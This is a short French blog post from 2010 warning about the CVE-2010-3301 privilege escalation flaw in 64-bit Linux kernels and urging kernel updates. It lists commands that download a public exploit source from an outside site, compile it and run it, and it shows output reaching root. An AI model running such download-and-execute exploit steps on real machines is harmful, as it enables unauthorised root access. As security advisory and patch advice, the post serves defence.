Faille de sécurité sur les kernel linux en 64 bits
Par Dju » 19 septembre 2010 (21:02) - Linux
Attention ! si vous avez une machine linux avec un kernel 64 bits, vous êtes en danger !
En effet, une faille vient d'être (re)découverte, et en l'utilisant, un simple utilisateur peut devenir root en élevant ses privilèges (CVE-2010-3301)
Voici l'exploit, tiré de tux-planet :
wget www.tux-planet.fr/public/hack/exploits/kernel/robert-you-suck.c
gcc -o robert robert-you-suck.c
./robert
et le résultat :
resolved symbol commit_creds to 0xffffffff8108bd90 resolved symbol prepare_kernel_cred to 0xffffffff8108c170 mapping at 3f80000000 UID 0, EUID:0 GID:0, EGID:0 # id uid=0(root) gid=0(root)
Bref, pensez à mettre votre kernel à jour. !
Pour ubuntu 10.04, la derniere version (2.6.32-24) est patchée contre cette faille.
Si vous avez un kernel >= 2.6.27 et <= 2.6.33-23, vous êtes attackable
edit:
pour ubuntu, allez lire cette page qui indique les versions sécurisées par rapport à cette faille.
pour debian allez lire cette page
Soyez le premier à commenter ce billet
URL de rétrolien : https://blog.crifo.org/trackback/68